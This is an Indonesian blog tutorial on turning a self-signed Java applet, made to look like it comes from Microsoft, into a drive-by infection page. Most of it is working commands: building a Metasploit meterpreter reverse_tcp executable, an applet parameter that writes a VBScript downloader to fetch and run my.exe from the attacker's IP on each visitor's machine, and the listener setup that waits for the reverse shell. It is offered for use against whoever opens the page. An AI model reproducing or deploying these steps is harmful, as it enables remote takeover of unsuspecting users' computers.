Posts Subscribe comment Comments

Menginfeksi Java Applet !!

Kali ini kita akan belajar menggunakan java applet untuk kita inject dengan meterpreter metasploit.
sehingga siap saja yang membuka menggunakan browser pada halaman tertentu dapat
menjadikan metaploit bekerja.

Yang harus kita sediakan disini adalah :
1. Java
2. Web server.
hanya itu....

Yuk kita mulai membahasnya..........

nah setelah script applet jadi, 
kita sekarang coba untuk membundle applet ini dengan meterpreter yang sudah kita siapkan..
root@whitecyber-server:~/java-applet# wget http://www.whitecyber.com/download/makeapplet.sh && chmod a+x ./makeapplet.sh

yups maka akan muncul makeapplet.sh

hal ini untuk mempermudah saja cara memasukinya......

kita jalankan file makeapplet.sh tersebut

root@whitecyber-server:~/java-applet# ./makeapplet.sh

kita isi semua nie..... isian2 nya biar lebih mempermudah kita dalam membuat metacharackter

oot@whitecyber-server:~/java-applet# ./makeapplet.sh
Enter the name of the applet without the extension:
MSFcmd
[+] Packaging the compiled class into a JAR file
[+] Generating key pairs
...What is your first and last name?
[Unknown]: Microsoft
What is the name of your organizational unit?
[Unknown]: Microsoft Organization
What is the name of your organization?
[Unknown]: Redmond
What is the name of your City or Locality?
[Unknown]: Washington
What is the name of your State or Province?
[Unknown]: US
What is the two-letter country code for this unit?
[Unknown]: US
Is CN=Microsoft, OU=Microsoft Organization, O=Redmond, L=Washington, ST=US, C=US correct?
[no]: yes

[+] Signing the JAR file

Warning:
The signer certificate will expire within six months.
[+] Exporting the public key certificate
Certificate stored in file <mycertificate.cer>
[+] Done

Deploy the JAR and certificate files. They should be deployed to a distribution directory on a Web server.

<applet width='1' height='1' code=MSFcmd.class archive=SignedMSFcmd.jar> </applet>
nah selesai kita membuat sertivicate untuk program applet kita yan gini.
sekarang mulai dech kita tempel di server apache yang sudah kita siapkan

root@whitecyber-server:~/java-applet# cp SignedMSFcmd.jar /var/www/

kita pindahkan jg file yang sudah kita inject tadi

root@whitecyber-server:~/java-applet# cp MSFcmd.class /var/www/


kita jalankan apache server yang berbasis applet


root@whitecyber-server:~/java-applet# apache2ctl start
httpd (pid 1412) already running
root@whitecyber-server:~/java-applet#


Nah sekarang kita tadi telah melewati masa masa membuat tools untuk client .....

sekarang kita mulai membuat tools untuk dari sisi attacker !!! yaitu dengan mempersiapkan PAYLOADS pada metasploit

kita lihat dulu IP kita untuk kita masukkan kedalam payload metasploitnya


http://www.whatismyip.com/

yang dicetak besar itu ya ip kita


Sekarang kita mempersiapkan tools dari sisi attacker
ip saya secara otomatic berubah ubah

untuk saat ini ip saya adalah 180.246.42.30

nah sekarang kita mulai racik2 nie menjadi payload yang akan menerima shell nya
yuk masuk ke metasploit nya dulu..


root@whitecyber-server:/opt/framework-3.5.1/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=180.246.42.30 LPORT=443 R | ./msfencode -t exe -o my.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

root@whitecyber-server:/opt/framework-3.5.1/msf3#



yups bisa nie... masuk

selanjutnya kita masukkan lagi nie ke dalam server

root@whitecyber-server:/opt/framework-3.5.1/msf3# cp ./my.exe /var/www/

kita rubah dulu priviledge nya

root@whitecyber-server:/opt/framework-3.5.1/msf3# chmod a+x /var/www/my.exe

Sekarang kita mengambahkan perintah untuk kita tambahkan ke index.html yang akan mengijinkan client untuk mendownload dan mengeksekusi payload kita.
Dasarnya halaman ini akan melauch java applet yang di-sign oleh kita sendiri kemudian meng...izinkan client dan memanggil cmd.exe dari sistem mereka. kita akan menangkapnya menggunakan vbscript yang telah kita siapkan dengan nama "apsou.vbs" jadi kita tau file dapat masuk ke system target atau tidak. dari sinilah my.exe masuk dan payload akan terdownload dengan rapi.
sekarang kita cek dulu isi dari server kita tadi


http://localhost/


root@whitecyber-server:/var/www# ls -la
total 92
drwxr-xr-x 2 root root 4096 2011-03-18 08:06 .
drwxr-xr-x 15 root root 4096 2011-02-16 22:59 ..
-rw-r--r-- 1 root root 615 2011-03-18 06:40 MSFcmd.class
...-rwxr-xr-x 1 root root 73802 2011-03-18 07:55 my.exe
-rw-r--r-- 1 root root 2171 2011-03-18 06:40 SignedMSFcmd.jar
siap ya kita sekarang akan membuat halaman indexnya


root@whitecyber-server:/var/www# echo "<applet width='1' height='1' code='MSFcmd.class' archive='SignedMSFcmd.jar'>" > /var/www/index.html

sekarang biar lebih ampuh kita tambahin nie pake vbs

 
echo "<param name='first' value='cmd.exe /c echo Const adTypeBinary = 1 > \
C:\windows\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\apsou.vbs \
& echo Dim BinaryStream >> C:\windows\apsou.vbs & echo Set BinaryStream = Create...Object("ADODB.Stream") >> \
C:\windows\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\apsou.vbs & \
echo BinaryStream.Open >> C:\windows\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> \
C:\windows\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> \
C:\windows\apsou.vbs & echo Function BinaryGetURL(URL) >> C:\windows\apsou.vbs & echo Dim Http >> \
C:\windows\apsou.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\apsou.vbs & \
echo Http.Open "GET", URL, False >> C:\windows\apsou.vbs & echo Http.Send >> C: windows\apsou.vbs & \
echo BinaryGetURL = Http.ResponseBody >> C:\windows\apsou.vbs & echo End Function >> C:\windows\apsou.vbs & \
echo Set shell = CreateObject("WScript.Shell") >> C:\windows\apsou.vbs & echo shell.Run "C:\windows\my.exe" >> \
C:\windows\apsou.vbs & start C:\windows\apsou.vbs http://180.246.42.30/my.exe C:\windows\my.exe'> </applet>" >> \
/var/www/index.html
root@whitecyber-server:/var/www# echo "" >> /var/www/index.html
root@whitecyber-server:/var/www# echo "Untuk melihat halaman ini dengan baik anda harus menjalankan applet.
> Maaf atas ketidak nyamanan ini. " >> /var/www/index.html
 
 
Yups Selesai ... untuk membuat tools dari sisi attacker ....
 
yuk kita lanjutkan bagaimana attacker menunggu koneksi dari client
 
root@whitecyber-server:/var/www# /opt/framework-3.5.1/msf3/msfconsole


selesai..

tinggal menunggu siapapun yang akan membuka halaman index kita

msf > use exploit/multi/handler
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
...msf exploit(handler) > set LHOST 180.246.42.30
LHOST => 180.246.42.30
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > save
Saved configuration to: /root/.msf3/config
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[-] Handler failed to bind to 180.246.42.30:443
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...

0

Silahkan Tulis Komentar Anda ...